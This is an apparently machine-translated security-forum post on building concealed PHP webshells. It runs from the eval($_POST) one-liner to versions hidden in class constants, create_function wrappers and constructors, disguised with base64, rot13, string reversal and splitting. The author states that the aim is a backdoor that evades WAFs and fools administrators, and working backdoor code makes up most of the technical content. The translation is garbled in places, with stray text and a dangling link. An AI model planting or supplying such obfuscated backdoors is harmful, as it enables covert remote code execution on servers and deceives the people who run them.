
Posted by trammel at 2020-04-14

Featured post: a study of webshells in PHP. Don't miss it.

The author of this post is laimoc (formerly xoanhn), and his website is

This article is part of the Spring and Autumn (ichunqiu) original-content reward program and may not be reproduced without permission.

Previous posts:

I originally intended to write one comprehensive PHP script (modify, copy, delete and create files, traverse directories, and so on; execute system commands; upload files; encrypt/decrypt or encode/decode file contents; add, delete and modify database records; hijack login forms, etc.). That takes a lot of time to debug, and the individual modules are already scattered around the net in pieces, so I dropped the idea.

This post focuses on class encapsulation, constructors, the use of Perl class constants, and encoding/decoding, and on combining them into a webshell.

The most basic webshell is a single line that hands a request parameter to eval(); there is an even shorter form of the same thing.

So the motivation for this research was:

1. The shortest one-liner is intercepted outright by many WAFs and similar products.
2. I wanted to leave a backdoor that is relatively well hidden and easily fools an administrator.
3. I wanted to exercise my command of PHP.
4. I wanted to raise secure-programming awareness in our development team.

Start with the most basic class, then go a bit deeper and flesh it out. Well, that's right: it's a very ordinary class.

Now look at the Perl class. As shown above, the :: operator accesses the class constant from outside the class. Let's debug the Perl class:

Like magic, I think. PHP really makes me happy; I love her!

Now let's use the Perl class to make a webshell:

const PI is our Perl class constant: it is declared inside the class and then referenced from outside it with the :: operator. So what if we change PI to a base64 string and decode it first? Will it still execute, or will it fail because it is now a string? Don't be afraid, let's go and have a look. We have the universal echo to check with:
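As an added example (not code from the original post), here is the class-constant variant this paragraph describes. The names are assumptions: class Circle, constant PI and the POST parameter c. The constant holds the base64 encoding of the plain eval($_POST['c']); one-liner the post starts from, and the "universal echo" is a function that shows what the constant decodes to before anything is executed.

```php
<?php
// Added example, not the post's own code. A class constant holds the payload
// as base64; it is read from outside the class with :: and decoded before
// being handed to eval(). Assumed names: class Circle, const PI, POST key "c".

class Circle
{
    // base64_encode("eval(\$_POST['c']);") gives the literal below.
    const PI = 'ZXZhbCgkX1BPU1RbJ2MnXSk7';
}

// The "universal echo": inspect what the constant decodes to before running it.
// Strict mode makes base64_decode() return false on input that is not base64.
function decoded_payload()
{
    return base64_decode(Circle::PI, true);
}

echo decoded_payload(), PHP_EOL;   // prints: eval($_POST['c']);

// base64_decode() returns a string, so eval() accepts it like any other string.
// With a POST body of c=phpinfo(); this call runs phpinfo().
eval(decoded_payload());
```

Encoding the constant only hides the literal text eval($_POST from a signature match; the combination of eval() and base64_decode() near request data is itself a common detection signature, and because eval() is a language construct rather than a function, disable_functions does not block it, so runtime auditing of eval() calls is what catches this on the defending side.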

Try it out, and learn from it without restraint. My mentor gives great encouragement and is my role model:

While using this encoding I realized I could just as well use URL encoding, rot13, string reversal, string concatenation, string splitting (for example with explode), substring extraction and replacement (such as substr), quoted-printable conversion, and so on. For more information see: Http:// Below is a one-liner for debugging:
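The alternatives listed above, as an added example that is not part of the original post: each encoding of the same assumed payload is produced with the standard PHP function and checked against its decoder, so any of them can replace base64 in a class constant. The splitting and substr variants are shown as well, since they need no encoder at all.

```php
<?php
// Added example, not the post's own code. Produces the alternative encodings
// the post lists for one assumed payload and verifies that the matching
// decoder recovers it exactly.

$payload = "eval(\$_POST['c']);";

// encoder output => name of the function that turns it back into $payload
$variants = [
    'base64'  => [base64_encode($payload),           'base64_decode'],
    'url'     => [rawurlencode($payload),            'rawurldecode'],
    'rot13'   => [str_rot13($payload),               'str_rot13'],
    'reverse' => [strrev($payload),                  'strrev'],
    // quoted-printable only escapes "=" and bytes outside printable ASCII,
    // so for this payload it is an identity transform and hides nothing.
    'qprint'  => [quoted_printable_encode($payload), 'quoted_printable_decode'],
];

foreach ($variants as $name => [$encoded, $decoder]) {
    if ($decoder($encoded) !== $payload) {
        throw new RuntimeException("$name does not round-trip");
    }
    printf("%-8s %s\n", $name, $encoded);
}

// Splitting: store the payload as fragments and glue them back at runtime
// (explode() on a delimiter works the same way as str_split() here).
$parts = str_split($payload, 4);   // ["eval", "($_P", "OST[", "'c']", ");"]
if (implode('', $parts) !== $payload) {
    throw new RuntimeException('split/implode does not round-trip');
}

// substr(): bury the payload at a known offset inside a harmless-looking string.
$decoy  = 'harmless-prefix-' . $payload . '-suffix';
$offset = strlen('harmless-prefix-');
if (substr($decoy, $offset, strlen($payload)) !== $payload) {
    throw new RuntimeException('substr does not round-trip');
}

echo "all variants decode back to the payload\n";
```

Run it with php on the command line; every variant prints its encoded form, and a mismatch throws. Note that all of these are reversible transforms chosen for evasion, not secrecy: anyone who has the file has the payload.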

Let me explain how encapsulating the one-liner in a class works. First the finished product; its source code follows.

We mentioned the prototype of the class earlier; let's try it. Our class exposes a method that creates a function dynamically, which paves the way for the webshell. Then we can instantiate it:

$a = new a();

This is instantiation; in short, remember to instantiate with new. Now we can use the create_fun method we defined in the class, as follows:

$a ->create_fun($shell);

So is there still something missing here? Yes, the parameter. Let's simply define it: in a word, ha ha, simple and brutal.

$shell = 'eval($_POST[c]);';

(Single quotes are required here. Inside a double-quoted string PHP would interpolate $_POST[c] when this line is parsed, and the function body would end up as eval(); with nothing to evaluate.)

That completes the arrangement: the class encapsulation implements the one-liner. Let's test it:

Commands can be executed. That's it.

You can see that our phpinfo() works too.
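The complete class-wrapped one-liner that the steps above build up, as an added example rather than the post's own code. The class name a, the method name create_fun and the POST key c follow the post; the fallback branch is my addition, because create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so the post's version only runs on older interpreters.

```php
<?php
// Added example, not the post's own code. Class-encapsulated one-liner:
// the class turns a string of PHP source into a callable, and the caller
// feeds it the eval() one-liner. Names a, create_fun and POST key "c" follow
// the post; the PHP 8 fallback is my addition.

class a
{
    // Build a callable whose body is the PHP source in $body.
    public function create_fun($body)
    {
        if (function_exists('create_function')) {
            // PHP <= 7.4: returns the name of a freshly created lambda.
            return create_function('', $body);
        }
        // PHP >= 8.0: create_function() is gone; wrap the body in a closure.
        return eval('return function () { ' . $body . ' };');
    }
}

// Single quotes matter. In a double-quoted string PHP would interpolate
// $_POST[c] while this line is parsed, leaving the body as "eval();".
$shell = 'eval($_POST["c"]);';

$a = new a();                  // instantiate with new
$f = $a->create_fun($shell);   // string -> callable
$f();                          // executes whatever arrived in POST parameter c
```

A string returned by create_function() and a Closure returned by eval() are both invoked the same way with $f(), which is why the caller does not need to know which branch ran.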

Finally, let's talk about combining a constructor to produce the one-liner. In fact, if you are good at debugging, the research could stop here.

But to say a few more words, I'll stay a little longer. First, let me show how to reverse a string, which struck me as a bit of PHP magic:

That piece of code is enough to do it. Haha, actually it can also be done with a single word: strrev. This function is powerful and suggests its own uses.
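The constructor idea promised above combined with string reversal, as an added example that is not the post's code. The hand-rolled reverse_bytes() stands in for the loop the post shows and is interchangeable with strrev(); the class name Loader, the property $s and the POST key c are assumptions.

```php
<?php
// Added example, not the post's own code. Combines the two remaining ideas:
// a constructor, so that merely instantiating the class runs the payload,
// and string reversal, so that the stored string never contains "eval(".
// Assumed names: class Loader, property $s, POST key "c".

// Hand-rolled reversal, equivalent to strrev(). Both work byte by byte, so
// neither is safe on multibyte UTF-8 text; that is fine for ASCII PHP source.
function reverse_bytes($str)
{
    $out = '';
    for ($i = strlen($str) - 1; $i >= 0; $i--) {
        $out .= $str[$i];
    }
    return $out;
}

class Loader
{
    // strrev('eval($_POST["c"]);') -- the payload stored backwards
    private $s = ';)]"c"[TSOP_$(lave';

    public function __construct()
    {
        // __construct() runs on new, so nothing else has to be called.
        eval(reverse_bytes($this->s));   // or: eval(strrev($this->s));
    }
}

new Loader();   // instantiate and discard: the constructor has already run
```

Because the reversed string is stored in a single-quoted literal, neither the $ nor the quotes inside it need escaping, and a grep for eval( or $_POST over the file finds nothing; a grep for eval(strrev or eval(reverse still does, which is the usual trade-off with every one of these encodings.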

How should you use this reversal function? In a word: take it slowly and use it often, the experience the seniors taught me. Better to teach fishing than to hand out fish. When you have grown up and succeeded, you can share a bowl of soup with us.

OK, let's not digress. My neck is aching; we should all exercise regularly.

The picture below, I guarantee, will surprise and excite you!

This is the end of my last study of PHP webshells. I'm getting ready to learn C.

I will pack up all the attachments and not hide them any more. Thanks to all the cousins who reply.